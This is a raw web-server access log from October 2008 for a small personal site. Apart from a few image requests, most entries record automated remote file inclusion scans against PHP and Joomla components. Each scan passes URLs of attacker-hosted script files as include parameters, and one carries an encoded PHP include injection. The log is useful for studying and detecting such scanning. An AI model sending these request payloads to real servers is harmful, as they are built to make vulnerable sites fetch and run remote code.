98.136.50.138 - - [26/Oct/2008:10:26:04 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.102.137.163 - - [26/Oct/2008:10:26:04 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:26:07 -0700] "GET /logs/access_080824.log/index.php?sub=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
99.162.124.241 - - [26/Oct/2008:10:26:08 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.162.124.241 - - [26/Oct/2008:10:26:09 -0700] "GET /include/admin.lib.inc.php?site_path=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:26:11 -0700] "GET /logs/access_080802.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.251.24.119 - - [26/Oct/2008:10:26:11 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.251.24.119 - - [26/Oct/2008:10:26:11 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:26:14 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-149_0.jpg HTTP/1.1" 200 248840 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:26:22 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:26:22 -0700] "GET /skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:26:22 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:26:24 -0700] "GET /logs/access_080809.log/errors.php?error=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:26:24 -0700] "GET /logs/errors.php?error=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:26:27 -0700] "GET /logs/access_080811.log/errors.php?error=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:26:32 -0700] "GET /logs/access_080115.log/errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.110.52.227 - - [26/Oct/2008:10:26:33 -0700] "GET /logs/access_080529.log/errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:26:33 -0700] "GET /logs/errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.110.52.227 - - [26/Oct/2008:10:26:33 -0700] "GET /errors.php?error=http://www.helpvenice.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:26:35 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:26:41 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:26:50 -0700] "GET /logs/access_080425.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.137.163 - - [26/Oct/2008:10:26:55 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:27:01 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:27:01 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:27:01 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:27:05 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:27:05 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:27:06 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:27:17 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/005.jpg HTTP/1.1" 200 334232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
203.146.251.182 - - [26/Oct/2008:10:27:19 -0700] "GET /logs/access_080802.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.251.182 - - [26/Oct/2008:10:27:20 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:27:20 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.251.24.119 - - [26/Oct/2008:10:27:21 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.68.10 - - [26/Oct/2008:10:27:32 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.232.68.10 - - [26/Oct/2008:10:27:32 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.126.57.109 - - [26/Oct/2008:10:27:37 -0700] "GET /logs/?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://vobucks.com/spam/bo.do?? HTTP/1.1" 200 70876 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
207.126.57.109 - - [26/Oct/2008:10:27:37 -0700] "GET /?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://vobucks.com/spam/bo.do?? HTTP/1.1" 200 95080 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:27:39 -0700] "GET /logs/access_080216.log//faqsupport/samplefaqsupport.php?path[docroot]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:27:39 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:27:40 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:27:42 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0014.jpg HTTP/1.1" 200 376404 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:27:42 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:27:45 -0700] "GET /logs/access_071214.log/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.19.139 - - [26/Oct/2008:10:27:46 -0700] "GET /skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:27:46 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:27:54 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/019.jpg HTTP/1.1" 200 314049 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:27:58 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:27:58 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:28:03 -0700] "GET /logs/access_080507.log/phphtml.php?htmlclass_path=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:28:16 -0700] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.171.131 - - [26/Oct/2008:10:28:16 -0700] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.171.131 - - [26/Oct/2008:10:28:17 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.171.131 - - [26/Oct/2008:10:28:18 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:28:18 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
200.43.171.131 - - [26/Oct/2008:10:28:18 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:28:22 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.251.182 - - [26/Oct/2008:10:28:22 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:10:28:22 -0700] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:28:23 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.stormpages.com/arale/child/v7id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:28:24 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-182.jpg HTTP/1.1" 200 280449 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
203.146.251.182 - - [26/Oct/2008:10:28:28 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:28:28 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:28:35 -0700] "GET /logs/access_080908.log%20/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:28:37 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:28:38 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-126.jpg HTTP/1.1" 200 743530 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:28:40 -0700] "GET /logs/access_080908.log%20/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:28:40 -0700] "GET /logs/access_071212.log//admin/spaw/spaw_control.class.php?spaw_root=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.110.184 - - [26/Oct/2008:10:28:41 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:28:41 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.98.254 - - [26/Oct/2008:10:28:57 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:28:57 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:10:28:58 -0700] "GET /logs/access_081008.log/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.232.68.10 - - [26/Oct/2008:10:28:59 -0700] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://oursoultvxq.com/bbs/data/bbs/ideex.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:28:59 -0700] "GET /?view=page&pagename=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 8097 "-" "libwww-perl/5.65" "www.dmulk.com"
70.85.192.194 - - [26/Oct/2008:10:29:04 -0700] "GET /logs//?_zb_path=http://sior.org/zero/control.txt? HTTP/1.1" 200 70881 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
205.234.98.254 - - [26/Oct/2008:10:29:05 -0700] "GET /logs/access_080621.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.85.192.194 - - [26/Oct/2008:10:29:05 -0700] "GET /?_zb_path=http://sior.org/zero/control.txt? HTTP/1.1" 200 94735 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:10:29:06 -0700] "GET /logs/access_081008.log/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.38.38.231 - - [26/Oct/2008:10:29:08 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.38.231 - - [26/Oct/2008:10:29:08 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:29:17 -0700] "GET /logs/access_080621.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:10:29:18 -0700] "GET /logs/access_081008.log/errors.php?error=http://www.geocities.com/rio_rizaldy//v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:29:29 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:29:29 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.210.42.40 - - [26/Oct/2008:10:29:29 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
195.210.42.40 - - [26/Oct/2008:10:29:30 -0700] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:29:31 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:29:31 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:29:31 -0700] "GET /logs/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:29:32 -0700] "GET /logs/access_080621.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:29:34 -0700] "GET /logs/access_080918.log/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:29:34 -0700] "GET /components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:29:34 -0700] "GET /logs/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.47 - - [26/Oct/2008:10:29:40 -0700] "GET /logs/access_080314.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.phdcursos.com.br/http/idd.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:29:46 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:29:46 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:29:49 -0700] "GET /logs/access_080621.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:29:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-192.jpg HTTP/1.1" 200 285441 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:29:57 -0700] "GET /logs/access_080918.log/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:29:57 -0700] "GET /components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:29:57 -0700] "GET /logs/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:29:59 -0700] "GET /logs/access_080811.log/components/com_sef/sef.php?mosConfig_absolute_path=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:30:01 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:30:01 -0700] "GET /modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:30:01 -0700] "GET /logs/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:30:07 -0700] "GET /logs/access_080621.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:30:08 -0700] "GET /logs/access_080731.log//faqsupport/samplefaqsupport.php?path[docroot]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:30:16 -0700] "GET /logs/access_080621.log/modifyform.html?code=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:30:16 -0700] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
